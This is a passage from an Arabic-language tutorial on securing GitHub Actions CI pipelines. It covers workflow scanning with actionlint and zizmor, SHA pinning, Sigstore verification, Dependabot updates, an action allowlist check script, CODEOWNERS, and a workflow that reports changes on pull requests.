\u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629\u061b \u064a\u0648\u0641\u0631 zizmor \u062a\u062d\u0644\u064a\u0644\u0627\u064b \u0623\u0645\u0646\u064a\u064b\u0627 \u0623\u0639\u0645\u0642. \u0623\u0636\u0641 \u0643\u0644\u064a\u0647\u0645\u0627 \u0625\u0644\u0649 \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI \u0627\u0644\u062e\u0627\u0635 \u0628\u0643:<\/p>\n<pre><code>name: Workflow Security Scan\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n\njobs:\n  scan:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n      - name: Run actionlint\n        run: |\n          brew install actionlint\n          actionlint .github\/workflows\/*.yml\n      - name: Run zizmor\n        run: |\n          pip install zizmor\n          zizmor .github\/workflows\/<\/code><\/pre>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 4: \u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0633\u0644\u0627\u0645\u0629 \u0627\u0644\u0640 Actions<\/h2>\n<p>\u0627\u0644\u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0645\u062b\u0644 <code>@v4<\/code> \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u2014 \u064a\u0645\u0643\u0646 \u0646\u0642\u0644 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0644\u0644\u0625\u0634\u0627\u0631\u0629 \u0625\u0644\u0649 \u0623\u064a \u0627\u0644\u062a\u0632\u0627\u0645 \u0641\u064a \u0623\u064a \u0648\u0642\u062a. \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u064a\u0648\u0641\u0631 \u0636\u0645\u0627\u0646\u064b\u0627 \u062a\u0634\u0641\u064a\u0631\u064a\u064b\u0627 \u0628\u0623\u0646\u0643 \u062a\u0634\u063a\u0644 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0630\u0627\u062a\u0647\u0627 \u0627\u0644\u062a\u064a \u0631\u0627\u062c\u0639\u062a\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062d\u062f\u064a\u062f SHA \u0644\u0644\u0640 Actions<\/h3>\n<p>\u0627\u0633\u062a\u062e\u062f\u0645 GitHub CLI \u0644\u062a\u062d\u062f\u064a\u062f SHA \u0627\u0644\u062d\u0627\u0644\u064a \u0644\u0643\u0644 \u0639\u0644\u0627\u0645\u0629 action:<\/p>\n<pre><code># \u062a\u062d\u062f\u064a\u062f actions\/checkout@v4\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: b4ffde65f46336ab88eb53be808477a3936bae11\n\n# \u062a\u062d\u062f\u064a\u062f actions\/setup-node@v4\ngh api repos\/actions\/setup-node\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: 60edb5dd545a775178f52524783378180af0d1f8\n\n# \u062a\u062d\u062f\u064a\u062f actions\/cache@v4\ngh api repos\/actions\/cache\/git\/ref\/tags\/v4 --jq '.object.sha'\n# \u0627\u0644\u0645\u062e\u0631\u062c: 0c45773b623bea8c8e75f6c82b208c3cf94d9d67<\/code><\/pre>\n<p><strong>\u0645\u0647\u0645:<\/strong> \u0628\u0639\u0636 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u062a\u0634\u064a\u0631 \u0625\u0644\u0649 \u0643\u0627\u0626\u0646\u0627\u062a \u0639\u0644\u0627\u0645\u0627\u062a \u0645\u064f\u0639\u0644\u0651\u0642\u0629 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645\u0627\u062a \u0645\u0628\u0627\u0634\u0631\u0629. \u0641\u064a \u0647\u0630\u0647 \u0627\u0644\u062d\u0627\u0644\u0629\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0625\u0644\u063a\u0627\u0621 \u0645\u0631\u062c\u0639 \u0627\u0644\u0639\u0644\u0627\u0645\u0629:<\/p>\n<pre><code># \u0625\u0630\u0627 \u0623\u0631\u062c\u0639 \u0627\u0644\u0623\u0645\u0631 \u0623\u0639\u0644\u0627\u0647 \u0643\u0627\u0626\u0646 \u0645\u0646 \u0646\u0648\u0639 'tag'\u060c \u0642\u0645 \u0628\u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u0645\u0631\u062c\u0639:\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4 --jq '.object' \n# \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0648\u0639 \"tag\"\u060c \u0627\u062d\u0635\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0623\u0633\u0627\u0633\u064a:\ngh api repos\/actions\/checkout\/git\/tags\/TAG_SHA --jq '.object.sha'<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u062a\u062d\u062f\u064a\u062b \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644<\/h3>\n<p>\u0627\u0633\u062a\u0628\u062f\u0644 \u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0628\u062a\u062b\u0628\u064a\u062a SHA. \u0623\u0636\u0641 \u062f\u0627\u0626\u0645\u064b\u0627 \u062a\u0639\u0644\u064a\u0642\u064b\u0627 \u0628\u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629 \u0644\u0633\u0647\u0648\u0644\u0629 \u0627\u0644\u0642\u0631\u0627\u0621\u0629:<\/p>\n<pre><code>steps:\n  - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n  - uses: actions\/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4\n    with:\n      node-version: '20'\n  - uses: actions\/cache@0c45773b623bea8c8e75f6c82b208c3cf94d9d67 # v4\n    with:\n      path: ~\/.npm\n      key: ${{ runner.os }}-npm-${{ hashFiles('**\/package-lock.json') }}<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore (\u0639\u0646\u062f \u062a\u0648\u0641\u0631\u0647\u0627)<\/h3>\n<p>\u0628\u0639\u0636 \u0646\u0627\u0634\u0631\u064a \u0627\u0644\u0640 actions \u064a\u0648\u0642\u0639\u0648\u0646 \u0625\u0635\u062f\u0627\u0631\u0627\u062a\u0647\u0645 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Sigstore. \u064a\u0645\u0643\u0646\u0643 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u062a\u0648\u0642\u064a\u0639\u0627\u062a:<\/p>\n<pre><code># \u062a\u062b\u0628\u064a\u062a cosign\nbrew install cosign\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0625\u0635\u062f\u0627\u0631 action \u0645\u0648\u0642\u0639 (\u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0646\u0627\u0634\u0631 \u064a\u0648\u0642\u0639\u0647\u0627)\ncosign verify-blob \\\n  --certificate-identity \"https:\/\/github.com\/actions\/checkout\/.github\/workflows\/release.yml@refs\/tags\/v4\" \\\n  --certificate-oidc-issuer \"https:\/\/token.actions.githubusercontent.com\" \\\n  --bundle checkout-v4.sigstore.json \\\n  checkout-v4.tar.gz<\/code><\/pre>\n<p>\u0644\u064a\u0633\u062a \u0643\u0644 \u0627\u0644\u0640 actions \u062a\u0646\u0634\u0631 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore \u0628\u0639\u062f\u060c \u0644\u0643\u0646 \u0647\u0630\u0647 \u0645\u0645\u0627\u0631\u0633\u0629 \u0646\u0627\u0634\u0626\u0629.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0625\u0639\u062f\u0627\u062f Dependabot \u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a SHA \u0627\u0644\u0622\u0644\u064a\u0629<\/h3>\n<p>\u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u064a\u0639\u0646\u064a \u0623\u0646\u0643 \u0644\u0646 \u062a\u062d\u0635\u0644 \u0639\u0644\u0649 \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627. \u0627\u0633\u062a\u062e\u062f\u0645 Dependabot \u0644\u0623\u062a\u0645\u062a\u0629 \u0630\u0644\u0643 \u0645\u0639 \u0627\u0644\u062d\u0641\u0627\u0638 \u0639\u0644\u0649 \u0639\u062f\u0645 \u0627\u0644\u0642\u0627\u0628\u0644\u064a\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631:<\/p>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/dependabot.yml<\/code>:<\/p>\n<pre><code>version: 2\nupdates:\n  - package-ecosystem: \"github-actions\"\n    directory: \"\/\"\n    schedule:\n      interval: \"weekly\"\n      day: \"monday\"\n    open-pull-requests-limit: 10\n    labels:\n      - \"dependencies\"\n      - \"github-actions\"\n    reviewers:\n      - \"your-security-team\"\n    commit-message:\n      prefix: \"chore(deps)\"<\/code><\/pre>\n<p>\u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645 \u0625\u0635\u062f\u0627\u0631 \u0646\u0633\u062e\u0629 \u062c\u062f\u064a\u062f\u0629 \u0645\u0646 action\u060c \u0633\u064a\u0646\u0634\u0626 Dependabot \u0637\u0644\u0628 PR \u064a\u062d\u062f\u0651\u062b \u062a\u062b\u0628\u064a\u062a SHA:<\/p>\n<pre><code># \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0641\u0631\u0642 PR \u0645\u0646 Dependabot:\n- uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n+ uses: actions\/checkout@8ade135a41bc03ea155e62e844d188df1ea18608 # v4.1.2<\/code><\/pre>\n<p>\u0647\u0630\u0627 \u064a\u0645\u0646\u062d\u0643 \u0623\u0641\u0636\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0639\u0627\u0644\u0645\u064a\u0646: \u0645\u0631\u0627\u062c\u0639 \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0645\u0639 \u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0622\u0644\u064a\u0629 \u062a\u0645\u0631 \u0639\u0628\u0631 \u0639\u0645\u0644\u064a\u0629 \u0645\u0631\u0627\u062c\u0639\u0629 PR \u0627\u0644\u0639\u0627\u062f\u064a\u0629.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 5: \u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 Actions<\/h2>\n<p>\u062d\u062a\u0649 \u0645\u0639 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u0641\u062d\u0635\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0622\u0644\u064a\u0629 \u0644\u0645\u0646\u0639 \u0627\u0644\u0640 actions \u063a\u064a\u0631 \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629 \u0645\u0646 \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644. \u062a\u0636\u0645\u0646 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0623\u0646 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u064f\u062f\u0642\u0642\u0629 \u0641\u0642\u0637 \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u064a\u0627\u0631 \u0623: GitHub Enterprise \u2014 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0645\u0646\u0638\u0645\u0629<\/h3>\n<p>\u0625\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062a\u062e\u062f\u0645 GitHub Enterprise\u060c \u064a\u0645\u0643\u0646\u0643 \u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0640 actions \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0645\u0646\u0638\u0645\u0629:<\/p>\n<ol>\n<li>\u0627\u0630\u0647\u0628 \u0625\u0644\u0649 <strong>\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0645\u0646\u0638\u0645\u0629<\/strong><\/li>\n<li>\u0627\u0646\u062a\u0642\u0644 \u0625\u0644\u0649 <strong>Actions &rarr; General<\/strong><\/li>\n<li>\u062a\u062d\u062a <strong>\u0627\u0644\u0633\u064a\u0627\u0633\u0627\u062a<\/strong>\u060c \u0627\u062e\u062a\u0631 <strong>\u0627\u0644\u0633\u0645\u0627\u062d \u0644\u0640 actions \u0648\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0625\u0639\u0627\u062f\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u062d\u062f\u062f\u0629<\/strong><\/li>\n<li>\u0623\u0636\u0641 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629: <code>actions\/checkout@*<\/code>\u060c <code>actions\/setup-node@*<\/code>\u060c \u0625\u0644\u062e.<\/li>\n<\/ol>\n<p>\u0647\u0630\u0627 \u0647\u0648 \u0623\u0642\u0648\u0649 \u062a\u0637\u0628\u064a\u0642 \u0644\u0623\u0646 GitHub \u0646\u0641\u0633\u0647 \u0633\u064a\u0631\u0641\u0636 \u062a\u0634\u063a\u064a\u0644 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 actions \u063a\u064a\u0631 \u0645\u0633\u0645\u0648\u062d \u0628\u0647\u0627.<\/p>\n<h3>\u0627\u0644\u062e\u064a\u0627\u0631 \u0628: \u0641\u062d\u0635 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0627\u0644\u0645\u0628\u0646\u064a \u0639\u0644\u0649 CI<\/h3>\n<p>\u0644\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0628\u062f\u0648\u0646 GitHub Enterprise\u060c \u064a\u0645\u0643\u0646\u0643 \u0625\u0646\u0634\u0627\u0621 \u0622\u0644\u064a\u0629 \u062a\u0637\u0628\u064a\u0642 \u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 CI.<\/p>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>allowed-actions.txt<\/code> \u0641\u064a \u062c\u0630\u0631 \u0645\u0633\u062a\u0648\u062f\u0639\u0643:<\/p>\n<pre><code># GitHub Actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629\n# \u0627\u0644\u0635\u064a\u063a\u0629: owner\/repo\n# \u0627\u0644\u0623\u0633\u0637\u0631 \u0627\u0644\u062a\u064a \u062a\u0628\u062f\u0623 \u0628\u0640 # \u0647\u064a \u062a\u0639\u0644\u064a\u0642\u0627\u062a\n\n# Actions \u0627\u0644\u0631\u0633\u0645\u064a\u0629 \u0645\u0646 GitHub\nactions\/checkout\nactions\/setup-node\nactions\/cache\nactions\/upload-artifact\nactions\/download-artifact\nactions\/github-script\n\n# \u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0627\u0646\ngithub\/codeql-action\n\n# \u0623\u0637\u0631\u0627\u0641 \u062b\u0627\u0644\u062b\u0629 \u0645\u0639\u062a\u0645\u062f\u0629\ndocker\/build-push-action\ndocker\/login-action<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0644\u062a\u062d\u0642\u0642.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>scripts\/check-actions.sh<\/code>:<\/p>\n<pre><code>#!\/bin\/bash\nset -euo pipefail\n\nALLOWLIST=\"allowed-actions.txt\"\nWORKFLOW_DIR=\".github\/workflows\"\nFAILED=0\n\nif [[ ! -f \"$ALLOWLIST\" ]]; then\n  echo \"ERROR: Allowlist file not found: $ALLOWLIST\"\n  exit 1\nfi\n\n# \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062c\u0645\u064a\u0639 \u0645\u0631\u0627\u062c\u0639 'uses:' \u0645\u0646 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\necho \"Scanning workflow files for action references...\"\necho \"================================================\"\n\nfor workflow in \"$WORKFLOW_DIR\"\/*.yml \"$WORKFLOW_DIR\"\/*.yaml; do\n  [[ -f \"$workflow\" ]] || continue\n  \n  echo \"\"\n  echo \"Checking: $workflow\"\n  \n  # \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0640 actions (owner\/repo \u0645\u0646 uses: owner\/repo@ref)\n  actions=$(grep -oP 'uses:\\s+\\K[^@\\s]+' \"$workflow\" | \\\n    grep '\/' | \\\n    grep -v '^\\.\\.\/\\|^docker:\/\/' | \\\n    sort -u)\n  \n  for action in $actions; do\n    if grep -qx \"$action\" \"$ALLOWLIST\"; then\n      echo \"  \u2713 $action (approved)\"\n    else\n      echo \"  \u2717 $action (NOT IN ALLOWLIST)\"\n      FAILED=1\n    fi\n  done\ndone\n\necho \"\"\necho \"================================================\"\nif [[ $FAILED -eq 1 ]]; then\n  echo \"FAILED: Unapproved actions detected!\"\n  echo \"To approve a new action, add it to $ALLOWLIST and get security team review.\"\n  exit 1\nelse\n  echo \"PASSED: All actions are approved.\"\nfi<\/code><\/pre>\n<p>\u0627\u062c\u0639\u0644 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0642\u0627\u0628\u0644\u0627\u064b \u0644\u0644\u062a\u0646\u0641\u064a\u0630:<\/p>\n<pre><code>chmod +x scripts\/check-actions.sh<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642.<\/strong><\/p>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/workflows\/check-actions.yml<\/code>:<\/p>\n<pre><code>name: Action Allowlist Check\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n      - 'allowed-actions.txt'\n\npermissions:\n  contents: read\n\njobs:\n  check-actions:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n\n      - name: Check actions against allowlist\n        run: .\/scripts\/check-actions.sh<\/code><\/pre>\n<p><strong>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u062a\u0637\u0628\u064a\u0642.<\/strong><\/p>\n<p>\u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0641\u064a \u0641\u0631\u0639 \u0648\u0627\u0641\u062a\u062d PR:<\/p>\n<pre><code># \u0641\u064a \u0641\u0631\u0639 \u062c\u062f\u064a\u062f\u060c \u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629\ngit checkout -b test-unapproved-action\n\n# \u0623\u0636\u0641 action \u063a\u064a\u0631 \u0645\u0639\u062a\u0645\u062f\u0629 \u0625\u0644\u0649 ci.yml\n# \u0645\u062b\u0644\u0627\u064b\u060c uses: some-unknown\/action@v1\n\ngit add .github\/workflows\/ci.yml\ngit commit -m \"test: add unapproved action\"\ngit push origin test-unapproved-action\n# \u0627\u0641\u062a\u062d PR \u2192 \u0648\u0638\u064a\u0641\u0629 check-actions \u0633\u062a\u0641\u0634\u0644<\/code><\/pre>\n<p>\u0633\u062a\u0638\u0647\u0631 \u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a:<\/p>\n<pre><code>Checking: .github\/workflows\/ci.yml\n  \u2713 actions\/checkout (approved)\n  \u2713 actions\/setup-node (approved)\n  \u2713 actions\/cache (approved)\n  \u2717 some-unknown\/action (NOT IN ALLOWLIST)\n\n================================================\nFAILED: Unapproved actions detected!\nTo approve a new action, add it to allowed-actions.txt and get security team review.<\/code><\/pre>\n<p>\u0627\u062c\u0639\u0644 \u0647\u0630\u0627 \u0641\u062d\u0635 \u062d\u0627\u0644\u0629 \u0645\u0637\u0644\u0648\u0628 \u0641\u064a \u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639 \u0644\u0641\u0631\u0636 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0639\u0644\u0649 \u062c\u0645\u064a\u0639 \u0637\u0644\u0628\u0627\u062a PR.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 6: \u0645\u0631\u0627\u0642\u0628\u0629 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 Actions<\/h2>\n<p>\u062d\u062a\u0649 \u0645\u0639 \u0627\u0644\u0642\u0648\u0627\u0626\u0645 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0648\u0627\u0644\u062a\u062b\u0628\u064a\u062a\u060c \u062a\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0631\u0624\u064a\u0629 \u062d\u0648\u0644 \u0645\u062a\u0649 \u062a\u062a\u063a\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644. \u0647\u0630\u0627 \u0627\u0644\u062a\u0645\u0631\u064a\u0646 \u064a\u064f\u0639\u062f\u0651 \u0622\u0644\u064a\u0627\u062a \u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0648\u0627\u0644\u062a\u0646\u0628\u064a\u0647.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0639\u062f\u0627\u062f CODEOWNERS<\/h3>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/CODEOWNERS<\/code> \u0644\u0637\u0644\u0628 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644:<\/p>\n<pre><code># \u0637\u0644\u0628 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\n.github\/workflows\/ @your-org\/security-team\n.github\/actions\/    @your-org\/security-team\nallowed-actions.txt @your-org\/security-team\n.github\/dependabot.yml @your-org\/security-team<\/code><\/pre>\n<p>\u0641\u0639\u0651\u0644 \u0642\u0627\u0639\u062f\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639 &#8220;\u0637\u0644\u0628 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0645\u0646 \u0645\u0627\u0644\u0643\u064a \u0627\u0644\u0634\u064a\u0641\u0631\u0629&#8221; \u0644\u0641\u0631\u0636 \u0630\u0644\u0643.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0645\u064f\u0628\u0644\u0651\u063a \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u064a\u0639\u0644\u0651\u0642 \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627 \u0639\u0644\u0649 \u0637\u0644\u0628\u0627\u062a PR \u0628\u0645\u0644\u062e\u0635 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 actions:<\/p>\n<pre><code>name: Workflow Change Report\non:\n  pull_request:\n    paths:\n      - '.github\/workflows\/**'\n\npermissions:\n  contents: read\n  pull-requests: write\n\njobs:\n  report:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4\n        with:\n          fetch-depth: 0\n\n      - name: Generate action change report\n        id: report\n        run: |\n          BASE=${{ github.event.pull_request.base.sha }}\n          HEAD=${{ github.event.pull_request.head.sha }}\n\n          echo \"## Workflow Changes Report\" > \/tmp\/report.md\n          echo \"\" >> \/tmp\/report.md\n\n          # \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0645\u064f\u0639\u062f\u0651\u0644\u0629\n          CHANGED_FILES=$(git diff --name-only \"$BASE\"..\"$HEAD\" -- .github\/workflows\/)\n\n          if [[ -z \"$CHANGED_FILES\" ]]; then\n            echo \"No workflow files changed.\" >> \/tmp\/report.md\n            exit 0\n          fi\n\n          echo \"### Changed Files\" >> \/tmp\/report.md\n          for file in $CHANGED_FILES; do\n            echo \"- \\`$file\\`\" >> \/tmp\/report.md\n          done\n          echo \"\" >> \/tmp\/report.md\n\n          # \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 actions\n          echo \"### Action Reference Changes\" >> \/tmp\/report.md\n          echo '```diff' >> \/tmp\/report.md\n          git diff \"$BASE\"..\"$HEAD\" -- .github\/workflows\/ | \\\n            grep -E '^[+-].*uses:' | \\\n            grep -v '^[+-]{3}' >> \/tmp\/report.md || true\n          echo '```' >> \/tmp\/report.md\n          echo \"\" >> \/tmp\/report.md\n          echo \"\u26a0\ufe0f **Security team review required for workflow changes.**\" >> \/tmp\/report.md\n\n      - name: Comment on PR\n        uses: actions\/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7\n        with:\n          script: |\n            const fs = require('fs');\n            const report = fs.readFileSync('\/tmp\/report.md', 'utf8');\n            await github.rest.issues.createComment({\n              owner: context.repo.owner,\n              repo: context.repo.repo,\n              issue_number: context.issue.number,\n              body: report\n            });<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u0627\u0633\u062a\u0641\u0627\u062f\u0629 \u0645\u0646 \u062a\u0646\u0628\u064a\u0647\u0627\u062a Dependabot \u0627\u0644\u0623\u0645\u0646\u064a\u0629<\/h3>\n<p>\u064a\u064f\u0628\u0644\u0651\u063a Dependabot \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627 \u0639\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 \u0641\u064a GitHub Actions. \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0641\u0639\u064a\u0644 \u0630\u0644\u0643:<\/p>\n<ol>\n<li>\u0627\u0630\u0647\u0628 \u0625\u0644\u0649 <strong>\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639 &rarr; \u0623\u0645\u0627\u0646 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0648\u0627\u0644\u062a\u062d\u0644\u064a\u0644<\/strong><\/li>\n<li>\u0641\u0639\u0651\u0644 <strong>\u062a\u0646\u0628\u064a\u0647\u0627\u062a Dependabot<\/strong><\/li>\n<li>\u0641\u0639\u0651\u0644 <strong>\u062a\u062d\u062f\u064a\u062b\u0627\u062a Dependabot 